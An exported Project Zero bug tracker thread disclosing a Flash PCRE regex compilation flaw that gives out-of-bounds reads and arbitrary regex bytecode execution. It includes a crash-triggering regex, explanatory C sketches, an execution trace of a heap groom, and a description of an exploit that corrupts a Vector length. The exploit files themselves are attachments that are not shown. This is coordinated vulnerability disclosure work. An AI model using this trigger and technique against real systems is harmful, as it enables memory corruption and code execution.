ericmckean / google-security-research

Automatically exported from code.google.com/p/google-security-research

Flash PCRE regex compilation logic issue #199

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
There’s a logic error in the PCRE engine version used in Flash that allows 
the execution of arbitrary PCRE bytecode, with potential for memory corruption 
and RCE. 

The issue is in the handling of the \c escape sequence (single ascii character) 
when followed by a multibyte utf8 character. The resulting bytecode will be 
treated differently by several code paths in pcre_compile.cpp, resulting in 
several interesting possibilities.

The simplest testcase that will crash an ASAN build of avmshell is the 
following:

\\c\xd0\x80+(?1)

The first component is a forced-ascii literal, which then takes the first byte 
of our multibyte character:

\       <---- start of escape sequence
c       <---- single ascii character
\xd0    <---- this must be our ascii character

\x80    <---- look, another single character
+       <---- simplify this expression to a repeated \x80
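
The byte split above can be made concrete with a minimal sketch. It assumes, as the walkthrough describes, that the \c handler takes exactly one byte of input without checking whether that byte starts a UTF-8 sequence. The toy_* helper names are hypothetical and are not taken from pcre_compile.cpp.

```c
#include <stddef.h>

/* Hypothetical helpers for illustration only; not PCRE source. */

/* A UTF-8 lead byte (0xc0 and above) announces continuation bytes to follow. */
static int toy_is_utf8_lead(unsigned char b) { return b >= 0xc0; }

/* A UTF-8 continuation byte has the bit pattern 10xxxxxx. */
static int toy_is_utf8_continuation(unsigned char b) { return (b & 0xc0) == 0x80; }

/*
 * Model of the split: `p` points at the byte following "\c" and `n` is the
 * number of bytes available. One byte is consumed as the escape's character.
 * Returns 1 if that leaves a stray continuation byte as the next item in the
 * pattern, else 0.
 */
static int toy_c_escape_orphans_byte(const unsigned char *p, size_t n)
{
    if (n < 2) return 0;
    return toy_is_utf8_lead(p[0]) && toy_is_utf8_continuation(p[1]);
}
```

For the tail of the testcase, the bytes 0xd0 0x80 '+', the function returns 1: the \x80 is left behind as a character of its own. For an ASCII tail such as 'A' '+' it returns 0.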

At this point, our emitted bytecode is the following:

OP_BRA  <---- (1) standard opening for start of regex
OP_CHAR <---- (2) one character
\xd0
OP_PLUS <---- (3) one character, repeated
\x80

Now when we get to (?1), we need to search for group number one. The search 
proceeds as follows:

OP_BRA  <---- (1) this is not our group, it doesn't capture

OP_CHAR <---- (2) a character, we need to check if it's multibyte
\xd0    <------------- it's a multibyte utf8 character
OP_PLUS <------------- better skip the second byte

\x80    <---- (3) don't know this one - let's go look up how long it is in our 
lookup table...

The highest valid opcode is 109, but \x80 is 128, so we read off the end of the 
lookup table.

We can abuse this on a normal non-ASAN build: the array is followed by a table 
of strings, and _pcre_OP_lengths[0x80] returns an instruction length of 110

+ 110   <---- (4) somewhere on the heap...
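
The desynchronised search can be reproduced with a toy model. This is a sketch under stated assumptions, not the code from pcre_compile.cpp: the opcode numbers are illustrative, the table holds only the four opcodes used here, the UTF-8 skip is simplified to 4-byte sequences, and all toy_* names are hypothetical. Unlike the vulnerable code, the sketch checks the opcode against the table size and reports the offset instead of reading out of bounds.

```c
#include <stddef.h>

#define TOY_TABLE_SIZE 110   /* opcodes 0..109, per the report */

/* Illustrative opcode numbers; assumed, not PCRE's authoritative values. */
enum { TOY_OP_END = 0, TOY_OP_CHAR = 27, TOY_OP_PLUS = 30, TOY_OP_BRA = 93 };

/* Instruction lengths in bytes; entries left at 0 are unknown to this model. */
static const unsigned char toy_lengths[TOY_TABLE_SIZE] = {
    [TOY_OP_END] = 1, [TOY_OP_CHAR] = 2, [TOY_OP_PLUS] = 2, [TOY_OP_BRA] = 3
};

/* Extra bytes announced by a UTF-8 lead byte (simplified to 4-byte UTF-8). */
static size_t toy_utf8_extra(unsigned char b)
{
    if (b >= 0xf0) return 3;
    if (b >= 0xe0) return 2;
    if (b >= 0xc0) return 1;
    return 0;
}

/*
 * Walk the bytecode the way the search is described above. Returns the offset
 * of the first byte that gets treated as an opcode but has no table entry,
 * or -1 if the walk reaches TOY_OP_END (or the end of the buffer) cleanly.
 */
static long toy_find_desync(const unsigned char *code, size_t len, int utf8)
{
    size_t i = 0;
    while (i < len) {
        unsigned char c = code[i];
        if (c >= TOY_TABLE_SIZE || toy_lengths[c] == 0) return (long)i;
        if (c == TOY_OP_END) return -1;
        i += toy_lengths[c];
        /* Single-character opcodes: skip the tail of a multibyte character. */
        if (utf8 && (c == TOY_OP_CHAR || c == TOY_OP_PLUS) && i <= len)
            i += toy_utf8_extra(code[i - 1]);
    }
    return -1;
}

/* The bytecode from the walkthrough: BRA, CHAR \xd0, PLUS \x80, END. */
static long toy_demo(int utf8)
{
    static const unsigned char code[] = {
        TOY_OP_BRA, 0, 0, TOY_OP_CHAR, 0xd0, TOY_OP_PLUS, 0x80, TOY_OP_END
    };
    return toy_find_desync(code, sizeof code, utf8);
}
```

With UTF-8 handling enabled, toy_demo(1) returns 6, the offset of the \x80 byte that ends up being read as an opcode. With it disabled, toy_demo(0) returns -1 because the walk stays aligned and reaches the end marker.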

The search then proceeds until it either finds the right bytecode for the group 
we were looking for, or hits OP_END or a NULL. It then fills in the opcode for 
a jump out to where it found that group.

See attached for an execution trace demonstrating a heap-groom and arbitrary 
regex bytecode execution (the regex used is slightly different to the above 
poc). Prior to this trace, a groom has been performed to leave a gap of size 
335 followed by a crafted buffer.

compile_branch  <---- first compile to establish length of regex
start_byte 41 (A)
start_byte 41 (A)
… snip …
start_byte 41 (A)
start_byte 41 (A)
start_byte 28 (()
compile_branch
start_byte 5c (\)
start_byte 80 (\x80)
start_byte 2a (*)
start_byte 29 ())
start_byte 3f (?)
start_byte 28 (()
start_byte 00 ()
malloc(335) [0x602a0001c8e0 - 0x602a0001ca2f] <--- note legitimate buffer ends 
at ca2f
compile_branch <---- second compile to produce regex bytecode in the buffer 
allocated above
start_byte 41 (A)
start_byte 41 (A)
… snip ...
start_byte 41 (A)
start_byte 41 (A)
start_byte 28 (()
compile_branch
start_byte 5c (\)
start_byte 80 (\x80)
start_byte 2a (*)
start_byte 29 ())
start_byte 3f (?)
start_byte 28 (()
from here1
code 0x602a0001c910 93 3 <---- print in find_bracket, last no. is 
_pcre_OP_lengths[c]
code 0x602a0001c913 27 2
code 0x602a0001c915 27 2
… snip ...
code 0x602a0001ca0f 27 2
code 0x602a0001ca11 27 2
code 0x602a0001ca13 102 1
code 0x602a0001ca14 94 1
code 0x602a0001ca19 27 2
code 0x602a0001ca1c 30 2
code 0x602a0001ca1e 128 110 <---- whoops
code 0x602a0001ca8c 35 2    <---- now outside legitimate heap buffer
code 0x602a0001ca8e 35 2
… snip ...
exec 0x602a0001c910 93 [0x601a0000cea0] <--- regex execution starts
exec 0x602a0001c913 27 [0x601a0000cea0]
exec 0x602a0001c915 27 [0x601a0000cea1]
… snip ....
exec 0x602a0001ca0f 27 [0x601a0000cf1e]
exec 0x602a0001ca11 27 [0x601a0000cf1f]
exec 0x602a0001ca13 102 [0x601a0000cf20]
exec 0x602a0001ca14 94 [0x601a0000cf20]
exec 0x602a0001ca19 27 [0x601a0000cf20]
exec 0x602a0001ca22 92 [0x601a0000cf20]
exec 0x602a0001ca25 81 [0x601a0000cf20]
exec 0x602a0001cae9 35 [0x601a0000cf20] <--- regex execution in our buffer of 
‘#’
exec 0x602a0001caeb 35 [0x601a0000cf20]
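
The address arithmetic in the trace can be checked with a short sketch. The constants are copied from the trace lines above; the macro and function names are hypothetical and exist only for this illustration.

```c
#include <stdint.h>

/* Values copied from the trace above. */
#define TRACE_BUF_BASE   UINT64_C(0x602a0001c8e0)
#define TRACE_BUF_SIZE   UINT64_C(335)
#define TRACE_BAD_OPCODE UINT64_C(0x602a0001ca1e)  /* where byte 128 was read */
#define TRACE_BAD_LENGTH UINT64_C(110)             /* bogus length from the table */

/* Returns 1 if addr lies inside [base, base + size), else 0. */
static int toy_in_buffer(uint64_t addr, uint64_t base, uint64_t size)
{
    return addr >= base && addr - base < size;
}

/* Address the search moves to after applying the bogus length. */
static uint64_t toy_next_after_bad_opcode(void)
{
    return TRACE_BAD_OPCODE + TRACE_BAD_LENGTH;
}
```

TRACE_BUF_BASE + TRACE_BUF_SIZE is 0x602a0001ca2f, which matches the buffer end printed by malloc in the trace. The misread opcode at 0x602a0001ca1e is still inside the buffer, but adding 110 gives 0x602a0001ca8c, which is 93 bytes past that end and is the first address the trace marks as outside the legitimate heap buffer.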

A patch for this issue against the github avmplus source is attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by markbr...@google.com on 25 Nov 2014 at 10:53

Attachments:

GoogleCodeExporter commented 9 years ago
[Setting owner to cevans@google.com. I think we should use owner to represent 
whoever is doing the comms with the vendor]

Original comment by cev...@google.com on 28 Nov 2014 at 9:08

GoogleCodeExporter commented 9 years ago
Updating with additional information sent to vendor in response to request for 
a crash repro:

It's quite an awkward bug to provide a reliable crash repro for: because of the 
way the Flash heap works, the out-of-bounds reads will almost always result in 
a silent failure to compile the regex. To get a crash directly from this issue 
you will need good instrumentation such as ASAN. One way to see that the bug 
has occurred is to instrument find_bracket in pcre_compile.cpp to print the 
pointer that it's currently dereferencing, for example by changing the start of 
the function to:

static const uschar *
find_bracket(const uschar *code, BOOL utf8, int number)
{
for (;;)
  {
    register int c = *code;
    fprintf(stderr, "code %p %i\n", code, c);
    if (c == OP_END) return NULL;

The example shown wasn't triggered from ActionScript, though; it came from a 
custom harness for testing the regex engine, so I don't have an ABC file to 
hand. The provided regex should still cause an OOB read crash under ASAN or 
valgrind when called from the RegExp object.

See attached for a partial exploit for this issue in desktop Flash; it uses 
this vulnerability to get arbitrary bytecode executed (in CompileRegex), and 
then leverages this to corrupt the length of a Vector.<uint> object on the 
heap. The provided file will then use this corrupted vector object to write the 
value 0x41414141 to address 0x40404040. As it requires some heap manipulation, 
mileage may vary - this has only been tested on the standard Flash on Windows 
8.1 x64 running in 32-bit desktop Internet Explorer on my laptop.

Original comment by markbr...@google.com on 17 Dec 2014 at 2:22

Attachments:

GoogleCodeExporter commented 9 years ago
Supplied another crash PoC to Adobe.

Original comment by markbr...@google.com on 18 Dec 2014 at 5:32

Attachments:

GoogleCodeExporter commented 9 years ago

Original comment by cev...@google.com on 4 Feb 2015 at 7:05

GoogleCodeExporter commented 9 years ago
https://helpx.adobe.com/security/products/flash-player/apsb15-04.html

Original comment by cev...@google.com on 6 Feb 2015 at 3:14

GoogleCodeExporter commented 9 years ago
Making publicly viewable; it's 7 days post-patch and there's a corresponding 
blog post: 
http://googleprojectzero.blogspot.com/2015/02/exploitingscve-2015-0318sinsflash.html

Also fixing severity to "High"

Original comment by cev...@google.com on 12 Feb 2015 at 5:42

GoogleCodeExporter commented 9 years ago
Adding the exploit source for the blog post, as it was pointed out that I 
forgot to upload it...

Exploit has only been tested on 32-bit desktop IE running on Windows 8.1.

Original comment by markbr...@google.com on 17 Feb 2015 at 4:19

Attachments: